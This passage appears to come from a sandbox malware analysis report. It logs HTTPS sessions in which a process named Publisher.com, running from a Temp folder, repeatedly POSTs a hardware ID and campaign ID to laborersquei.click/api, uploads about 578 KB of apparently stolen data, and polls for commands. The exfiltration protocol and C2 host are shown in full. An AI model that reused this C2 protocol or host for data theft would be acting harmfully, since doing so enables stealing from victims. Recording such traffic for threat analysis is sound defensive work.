52 4f 4e 0d 0a 2d 2d 48 41 34 4f 4f 39 4a 39 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f Data Ascii: --HA4OO9J9XContent-Disposition: form-data; name="hwid"45C9C26571B982ACD9AC212D15D33917--HA4OO9J9XContent-Disposition: form-data; name="pid"3--HA4OO9J9XContent-Disposition: form-data; name="lid"hRjzG3--TRON--HA4OO9J9XContent-Dispo
2024-12-27 19:24:46 UTC	5181	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 82 b9 Data Ascii: un 4F([:7s~X`nO`i`
2024-12-27 19:24:47 UTC	1138	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 19:24:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ilme46j1sdjgr5bcpovm0h41pj; expires=Tue, 22 Apr 2025 13:11:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v2VccYXNaH8B9lJs95Jtgq%2F9lIbYGWWSSYMkGb8NcNtVSlD%2F9EYMOY1repPcVOHGSUpJYR5Iws4UUMMNm%2F%2FanfmCOdOkTw6DBgvguWvbKZOaaTVFPYscc5RRs%2BbykJTkp1qK%2FAQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8bb1579fc942f5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1758&min_rtt=1753&rtt_var=667&sent=15&recv=26&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21467&delivery_rate=1627647&cwnd=195&unsent_bytes=0&cid=69eadfda69806208&ts=1306&x=0"
2024-12-27 19:24:47 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 19:24:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49777	104.21.89.250	443	6548	C:\Users\user\AppData\Local\Temp\243714\Publisher.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 19:24:49 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HCCMAK2AO03M0W7V7VU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 5487 Host: laborersquei.click
2024-12-27 19:24:49 UTC	5487	OUT	Data Raw: 2d 2d 48 43 43 4d 41 4b 32 41 4f 30 33 4d 30 57 37 56 37 56 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 35 43 39 43 32 36 35 37 31 42 39 38 32 41 43 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 48 43 43 4d 41 4b 32 41 4f 30 33 4d 30 57 37 56 37 56 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 43 43 4d 41 4b 32 41 4f 30 33 4d 30 57 37 56 37 56 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 Data Ascii: --HCCMAK2AO03M0W7V7VUContent-Disposition: form-data; name="hwid"45C9C26571B982ACD9AC212D15D33917--HCCMAK2AO03M0W7V7VUContent-Disposition: form-data; name="pid"1--HCCMAK2AO03M0W7V7VUContent-Disposition: form-data; name="lid"hRjzG3--TR
2024-12-27 19:24:50 UTC	1141	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 19:24:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5fije9ssv0blrn8csve8q84mlc; expires=Tue, 22 Apr 2025 13:11:28 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tVWqfS5%2BnocJKRxE%2FB5wd75cgdso%2FTrMamEWH%2Bag0bPy%2BMhzWgUfCj0dRu3fYRRlA0kNj6bBYRY8nL%2FqaEHqOYyow90%2F%2FU376mOF5lGeHFbGJ1y39%2BYoioQydY0Lca1n9WwQzFM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8bb16888a678e7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1992&min_rtt=1985&rtt_var=760&sent=8&recv=11&lost=0&retrans=0&sent_bytes=2845&recv_bytes=6407&delivery_rate=1426477&cwnd=234&unsent_bytes=0&cid=6870a4d568414306&ts=879&x=0"
2024-12-27 19:24:50 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 19:24:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49782	104.21.89.250	443	6548	C:\Users\user\AppData\Local\Temp\243714\Publisher.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 19:24:51 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XHJP64HTSIHHX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1213 Host: laborersquei.click
2024-12-27 19:24:51 UTC	1213	OUT	Data Raw: 2d 2d 58 48 4a 50 36 34 48 54 53 49 48 48 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 35 43 39 43 32 36 35 37 31 42 39 38 32 41 43 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 58 48 4a 50 36 34 48 54 53 49 48 48 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 48 4a 50 36 34 48 54 53 49 48 48 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 58 48 4a 50 36 34 48 54 53 49 48 48 Data Ascii: --XHJP64HTSIHHXContent-Disposition: form-data; name="hwid"45C9C26571B982ACD9AC212D15D33917--XHJP64HTSIHHXContent-Disposition: form-data; name="pid"1--XHJP64HTSIHHXContent-Disposition: form-data; name="lid"hRjzG3--TRON--XHJP64HTSIHH
2024-12-27 19:24:52 UTC	1128	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 19:24:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nmvofd9sfsifj7mg1akepf3ee0; expires=Tue, 22 Apr 2025 13:11:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nTcfPNCEnvGyDoJ%2FqrI3Hcarfcn1IyoVEyE3tjrrKTkwHYt48sP8DVGhT5VQEiKEEvcRZwGWNbU2W0jr24YAZFhznY6cW9%2FR1vSH4G4lRpciNn03kKeb94EF0zIB%2FTSlaJBMD78%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8bb175dd378cdc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2013&min_rtt=2004&rtt_var=769&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2127&delivery_rate=1406551&cwnd=250&unsent_bytes=0&cid=1a2d83463c3bbcc9&ts=785&x=0"
2024-12-27 19:24:52 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 19:24:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49788	104.21.89.250	443	6548	C:\Users\user\AppData\Local\Temp\243714\Publisher.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 19:24:53 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=QIPSW5CZVYIKZ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 578286 Host: laborersquei.click
2024-12-27 19:24:53 UTC	15331	OUT	Data Raw: 2d 2d 51 49 50 53 57 35 43 5a 56 59 49 4b 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 35 43 39 43 32 36 35 37 31 42 39 38 32 41 43 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 51 49 50 53 57 35 43 5a 56 59 49 4b 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 49 50 53 57 35 43 5a 56 59 49 4b 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 51 49 50 53 57 35 43 5a 56 59 49 4b Data Ascii: --QIPSW5CZVYIKZContent-Disposition: form-data; name="hwid"45C9C26571B982ACD9AC212D15D33917--QIPSW5CZVYIKZContent-Disposition: form-data; name="pid"1--QIPSW5CZVYIKZContent-Disposition: form-data; name="lid"hRjzG3--TRON--QIPSW5CZVYIK
2024-12-27 19:24:53 UTC	15331	OUT	Data Raw: a0 49 4e 00 4d 0a fd 97 41 e0 af 92 f2 01 24 78 61 2f 55 33 d3 42 ac aa b9 35 6d 91 ee cf fb fb 85 20 f8 f8 bb b2 fc 95 ea 8d f3 f0 a0 8e b7 e8 cf 1c fb 2f a4 3a 7d c9 b3 03 61 52 d2 f7 f2 bb ff 70 95 9f d7 2f f7 e7 fe fc 40 af 12 0f 64 97 a5 19 ce a2 cb ec 64 9a d5 98 f3 3f 80 d2 f8 f8 ff dd 6e f2 7f 1f e0 21 da 0f 67 a6 28 d0 42 20 f4 19 c2 82 8d 0f da 47 37 6a 34 41 61 bc 93 18 85 86 7e bb 90 9c c7 dc 9f 31 42 48 7f 2a fb 75 da b6 00 90 6a a0 07 c3 e3 83 33 6f 67 0c f4 38 eb d2 77 65 ef e9 69 0e c4 b8 d3 1b e4 71 c7 57 9c e5 50 97 cb 9d db 77 db e6 cd a3 16 49 09 08 b7 8f 4a 14 56 fa aa c7 1e 6a c7 78 d2 d1 09 5c 8f 7b 09 a2 5b 38 d7 db 51 10 f8 fd ca 74 72 3f ad 71 fa 14 83 db fd 83 1a aa db eb 4d 9c df a0 8b 9e 1b 15 3b a0 2e 28 1b fe ed 1b 40 22 f8 Data Ascii: INMA$xa/U3B5m /:}aRp/@dd?n!g(B G7j4Aa~1BH*uj3og8weiqWPwIJVjx\{[8Qtr?qM;.(@"
2024-12-27 19:24:53 UTC	15331	OUT	Data Raw: 58 bb 44 61 2f d8 ef 22 05 58 08 80 3b 54 f5 70 79 34 c0 87 98 f0 e8 c5 5e c3 47 74 2f c3 53 6c b6 6d 38 f1 67 4a a5 8d a8 cc 9c 0e 75 d6 6a 18 9b a3 b8 e4 6f b4 95 1b 42 9d 33 f4 43 30 76 09 3e a9 8a 95 aa 9f ff 65 c4 7c 66 5f 1c 9e fd bc dc df 42 1b a4 95 84 59 22 e8 79 85 08 c0 d1 c3 6e 0f 08 b3 1f 00 86 95 c1 ff 26 d9 39 60 e9 07 c8 6c 04 b9 4f 52 0e 9e 6d a2 08 72 ed 9e e4 ff b7 6f bb 7c aa 78 b2 b9 02 24 00 24 91 f7 7c ee f3 c4 81 c8 2e 0d 19 14 24 c0 fe 20 2e 3a 21 d2 0e 9c b7 c3 d9 8a c3 d2 0e d0 a1 d0 0b a0 ff 71 15 cb a3 c8 a2 e0 55 53 fe a5 53 f7 e6 60 17 0c 56 65 5b ef ca ee 2b 88 1b ec 34 e0 01 56 c9 de 68 61 ba 43 36 aa cb 0c 8e 09 9a 8c 48 4f 99 d2 76 54 31 b6 f1 51 6f be ab 26 0c 1c 2f f1 11 37 04 0f 3e 4c 47 bd 56 2a d2 a3 14 ec 6d 36 d8 Data Ascii: XDa/"X;Tpy4^Gt/Slm8gJujoB3C0v>e\|f_BY"yn&9`lORmro\|x$$\|.$ .:!qUSS`Ve[+4VhaC6HOvT1Qo&/7>LGV*m6
2024-12-27 19:24:53 UTC	15331	OUT	Data Raw: 65 a0 6e 3b 87 8f 7c 54 5e cf 72 49 88 ff a5 81 d4 f0 19 44 c7 28 74 67 68 98 ad fe 92 b7 e3 25 5c 99 48 9d 48 b3 ac 51 4f 09 77 e9 74 1d bb b4 95 ec 2b d2 8e d1 f8 d3 87 25 76 73 3c 15 c4 8e a4 a6 b1 3c 6a 77 a7 7b 38 3b 45 ec 10 d9 b4 50 41 be aa 15 b9 7a 86 ae 8a da b1 27 35 31 59 9d 35 31 33 5f cd ca 64 90 27 1a d2 ff e2 c2 87 50 fd 89 df b6 ec 07 19 e9 32 e1 97 cb 04 ea 2b b7 98 eb 23 63 31 33 fc d4 76 c2 d7 86 b3 5f 37 3b be 68 ec bb 25 49 4b 5d 7a 95 96 1e 62 86 40 40 50 4c ac 4c 81 0d e2 c2 b5 05 14 39 0c 82 98 32 e0 2a 56 57 12 22 6a 69 14 a8 3f 34 b9 7e 7e d4 74 cf 51 d0 cb 8f 51 4d e5 98 e7 83 0c 0a f5 f2 0f d3 8a f0 af fa 39 a5 7f fa 1a ea dc fe 20 0f ba ea b0 1f d6 b3 9e ed 79 2f 06 2c af 00 4b 4c d9 47 40 95 5c 77 77 3d 90 a1 06 0a e3 ff 4c Data Ascii: en;\|T^rID(tgh%\HHQOwt+%vs<<jw{8;EPAz'51Y513_d'P2+#c13v_7;h%IK]zb@@PLL92*VW"ji?4~~tQQM9 y/,KLG@\ww=L
2024-12-27 19:24:53 UTC	15331	OUT	Data Raw: bd 01 89 8b 78 03 c1 76 44 d5 67 29 72 66 48 5c 57 ab 2d 17 e0 e1 94 99 83 e4 9c 2a a9 5e de 35 76 90 02 1d 45 d1 fd f0 2a 21 1e 2f c3 57 92 87 af 33 a4 09 74 dd cc f7 67 46 5f 8d 36 63 c2 0a 6f ab 5c 7c 54 12 f1 19 ad 3b 39 8b cc 29 82 0b ff e0 43 a0 cb dd 3c 54 6c 6b 46 95 80 20 34 86 29 47 47 a0 c8 aa 88 9f 37 0b cc 03 8e 97 9c d6 68 0e f1 5b 8f b6 27 b7 da 74 7f 81 08 e8 fb e2 a0 e3 57 f6 1a 50 8e a6 dc 6b 75 75 a2 ad 74 ea 6a b8 6d f5 4d ab 3b 2b 98 a4 d7 e1 5b 78 a3 74 65 60 ab e2 5f 0a 61 40 20 17 b4 6b 83 81 e2 07 5d 33 dc 4d 0a ce 0a 40 7e 74 64 d0 46 e1 7b 0b 47 e9 d0 9b 7a ab 81 70 cf bf 93 19 f6 85 96 fc 1c 3b 70 fd 34 01 8b 76 5d e1 86 14 1c 48 80 14 8b 10 e1 47 ec fc dc 8f c1 60 6e c2 b5 05 75 68 29 2c 34 32 32 88 1c ee b7 a9 d9 cf 47 b5 68 Data Ascii: xvDg)rfH\W-^5vE!/W3tgF_6co\\|T;9)C<TlkF 4)GG7h['tWPkuutjmM;+[xte`_a@ k]3M@~tdF{Gzp;p4v]HG`nuh),422Gh
2024-12-27 19:24:53 UTC	15331	OUT	Data Raw: 82 af 3d 1a d5 18 20 71 f0 09 43 72 cd 5a 7f 9b 91 5d 02 71 94 f3 2c 35 ce 47 9a f1 ad 6d d4 d6 d4 2c b5 05 b5 4c b3 73 82 97 d2 a3 d2 05 26 1f 31 7e 56 23 fa ff 2c a5 2f a6 d2 ca 35 de 51 25 b4 94 6d eb 91 6d 56 67 a4 a2 e8 1a 25 f1 2b 8e fe b8 65 c5 3e d1 ca 4a 31 5b 69 20 21 5b 44 24 59 fa ed c4 d7 8f 85 2d bc 92 9f 8a 61 c0 ae d5 bc f5 ed 5e fa 2d ee 0b c7 c6 da 30 c6 f4 d6 b7 4a 78 1a d7 a1 0f 3b 71 3c 94 59 55 12 0f e5 ef ab 92 f8 1a 22 be b3 3f ff 29 54 67 ec 8c ab 7b df 4b f0 25 1d f5 dd ea 76 73 4e 93 7c b8 26 89 62 fc dd b2 f0 2d b8 62 cb 6e 83 99 63 19 22 3e 12 77 09 5c 19 4e 44 7d 24 5f 38 3d 91 a9 8e 87 66 63 46 6d 73 6a a2 b8 ee 11 29 1c 8d f3 2c 73 08 21 64 e4 40 9e c2 66 dd 45 65 40 58 1b ec fa 79 cb 90 9d e1 be 6e 39 e4 aa 00 a2 8e f4 ae Data Ascii: = qCrZ]q,5Gm,Ls&1~V#,/5Q%mmVg%+e>J1[i ![D$Y-a^-0Jx;q<YU"?)Tg{K%vsN\|&b-bnc">w\ND}$_8=fcFmsj),s!d@fEe@Xyn9
2024-12-27 19:24:53 UTC	15331	OUT	Data Raw: a4 46 dd b4 78 b4 3a 3f 30 b3 ba 5d 5e b3 dd a7 9a c0 e8 e6 e6 33 44 3b ab 43 6e e0 80 59 b2 a1 a0 d8 0b 31 f0 23 2a 4b 25 6e 80 a1 05 22 a6 f6 96 9f c5 81 1d 22 28 d9 c0 ab 2d d9 c7 4d 65 ed e9 33 26 a4 bb 01 b6 95 ab d9 cb 79 fa 59 dc 15 d7 ed 97 97 21 b0 3e fb 37 ef ec 5f 44 a0 63 80 64 08 9d ee e4 9e 87 a3 09 9c c5 c7 b3 ed c4 93 23 a7 e7 28 9a b8 db 4b 6b e1 9d 92 17 ce 38 df cf b1 c0 8b 54 2e 2d df 0c e0 e7 dc 95 bb 2d 73 4c c8 ea cb 45 ad 65 67 ee d5 47 8d 9e 3a a3 9b c9 a1 83 3d 23 e8 42 eb 0b be b5 36 b9 e3 5b f2 0f 7a 16 3e 42 48 f1 1a 40 b1 c6 d7 7e 84 ec c7 c6 5a ea 34 30 0c ed 5a 01 db d0 59 e4 7f 97 20 c6 bb ec 5c 76 a4 8a 34 3c 96 d1 84 fb 1f e8 62 02 26 7e a4 e6 8c 13 7c 07 64 05 83 4b bb 91 80 20 da 1c b4 35 c6 a8 03 7e 7d 60 be b3 30 9f Data Ascii: Fx:?0]^3D;CnY1#*K%n""(-Me3&yY!>7_Dcd#(Kk8T.--sLEegG:=#B6[z>BH@~Z40ZY \v4<b&~\|dK 5~}`0
2024-12-27 19:24:53 UTC	15331	OUT	Data Raw: 3f 43 f2 96 bf 0b 13 99 68 58 00 c3 bf 28 83 ee 9a 98 9c 77 63 d9 0e c4 e8 2b 69 41 26 e2 7d a5 d3 e7 1b 5c 95 b3 e7 27 d2 4d 1c 14 2f 2b 3f d7 9f 57 eb 70 4b b0 ad 57 92 8f d0 bd 2c 9c c4 d3 84 fc 42 1b 09 db 5b 4e bb 4c 5a 26 8e 84 f7 e3 83 dc a1 ec ca 55 b5 f2 9f d8 e2 c7 91 63 f7 cd f4 23 78 a0 37 43 dd 23 23 aa f4 af 44 6e 66 50 e9 33 bf 3f 25 de df 22 33 54 83 de 48 92 e9 bd e2 82 dd bf 33 6d 25 de 9f 2e af a4 a7 08 92 7d 4e ff fe 73 37 04 04 3b fb f9 30 e0 91 72 e6 63 57 64 76 22 f5 f6 bc 26 bb 46 9c eb e9 5f f6 a4 ce bb e2 06 4f cb 61 f5 e8 2b 7d cb 63 a6 90 dd 71 77 fb eb dc 7f bf 57 3c 8e d2 e8 96 ac 13 84 f7 72 bc 19 2c 0c ee d6 aa 78 38 fe fc 56 76 98 71 a4 84 3e 6a b5 b6 16 69 33 e7 d6 7c 27 6f 2d 07 91 89 00 23 0b ed 18 4d 7f cf c8 c3 1a 91 Data Ascii: ?ChX(wc+iA&}\'M/+?WpKW,B[NLZ&Uc#x7C##DnfP3?%"3TH3m%.}Ns7;0rcWdv"&F_Oa+}cqwW<r,x8Vvq>ji3\|'o-#M
2024-12-27 19:24:53 UTC	15331	OUT	Data Raw: eb a3 6b 7d 37 36 6b 34 f3 f8 03 5d 8f af 36 da c6 8e 32 1e 28 ca b7 d5 10 3d c6 0e e3 a2 55 bb 00 77 72 3e ea 24 1e 2e ba dd 31 57 cf b6 70 cf 4e c4 1d d8 29 8f 30 5f 61 5e e3 41 54 15 b2 f2 e5 cf 71 d2 48 29 84 c4 71 e1 2f e3 74 fd 13 c7 45 34 1c 61 d9 b9 ab 63 b6 11 84 d1 5a 01 ee 2d 60 f3 d5 58 02 20 38 6f 46 ad d1 16 04 d8 c5 5b 24 fb 78 e4 ef b5 93 b6 d9 e8 98 b5 70 3b b3 fa bb 18 4a da 06 26 66 7c 48 17 a3 d5 8a 48 48 22 b6 32 91 2c e4 ec cf bf 71 f2 c3 7c 1f bf 93 8f c7 46 99 51 98 cf c4 19 e7 b0 79 84 e2 b2 ad 44 e5 a5 af 93 9a ed 8d ab 8a 3a af 76 50 51 11 b7 a5 08 7d e1 ef 0e e3 3d 01 ec 2f 72 e8 68 2b 73 4a bf ed 67 2b e9 c9 2e 99 fb e6 2a 93 e7 7a 72 c9 1d 95 9c 8f c7 74 69 24 df 2d d1 cd 37 07 3a 14 f5 94 f0 89 f5 69 0a 76 18 c2 fd 6f b5 a8 Data Ascii: k}76k4]62(=Uwr>$.1WpN)0_a^ATqH)q/tE4acZ-`X 8oF[$xp;J&f\|HHH"2,q\|FQyD:vPQ}=/rh+sJg+.*zrti$-7:ivo
2024-12-27 19:24:53 UTC	15331	OUT	Data Raw: 84 fe 77 dc 22 af cc fa 88 c7 bf bd b5 fe 6d 73 e9 e7 2e c0 5b 6d 02 90 b0 00 f3 ce 3d ee c5 01 8b d9 54 46 91 e8 70 d6 05 b3 17 f5 80 5a 92 44 ad 16 03 37 76 da e5 d4 7b 79 35 f0 8c c9 0e 5d 0c 78 de 29 26 9f 53 3d cd 71 7b d2 5c 7c 84 73 e3 7b ac 14 bc 97 75 20 35 46 02 e0 3b 70 0c 1c 01 df 8d 82 65 b7 be 68 7f 69 e1 65 3a d3 88 e8 72 67 8b 4b 16 28 58 37 b6 53 b8 25 4f f3 18 b0 b4 c8 6e a8 57 59 0b 49 6e 41 12 cb 51 aa 3d 6e 48 2d 65 a5 3e aa 3a 4b 55 5e e8 fe a2 0b 82 54 c9 01 5b 12 e0 c3 ba 99 a0 a1 cc d4 ab 62 be 3c cc 62 e6 f1 e8 8d 53 6f b0 57 86 1a d0 ba 5b f4 90 fe 1e 93 fc 73 25 9a 49 70 84 14 e8 6d c0 03 62 3e 40 89 57 1f a0 2b d1 94 92 4d 14 6f 6a 33 f7 46 19 09 82 55 7b b7 7a 3b 24 4b 70 8b 42 6c 30 36 0f df b1 b5 6b d6 8c 95 2a ea 5a 60 86 Data Ascii: w"ms.[m=TFpZD7v{y5]x)&S=q{\\|s{u 5F;pehie:rgK(X7S%OnWYInAQ=nH-e>:KU^T[b<bSoW[s%Ipmb>@W+Moj3FU{z;$KpBl06k*Z`
2024-12-27 19:24:55 UTC	1139	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 19:24:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ej1gtm9q94jelshc562e15eg19; expires=Tue, 22 Apr 2025 13:11:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a0UAwFYbOy2dOIEA9YEtaU4GiYUgGbSMOE2nMG43xAZk7PoDj9TEwwYK%2Fr6NeIFjCGSuWgCTd%2Bd6Quj1h95WQZ%2FM7BM5zZuZGcelrDoaFzMsqKaunMlhoIa0utp%2FibIgf4%2FvE58%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8bb183fbd3c439-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1716&rtt_var=649&sent=209&recv=607&lost=0&retrans=0&sent_bytes=2846&recv_bytes=580852&delivery_rate=1701631&cwnd=207&unsent_bytes=0&cid=759498ec2a6c904e&ts=2371&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49798	104.21.89.250	443	6548	C:\Users\user\AppData\Local\Temp\243714\Publisher.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 19:24:57 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 113 Host: laborersquei.click
2024-12-27 19:24:57 UTC	113	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 34 35 43 39 43 32 36 35 37 31 42 39 38 32 41 43 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397&hwid=45C9C26571B982ACD9AC212D15D33917
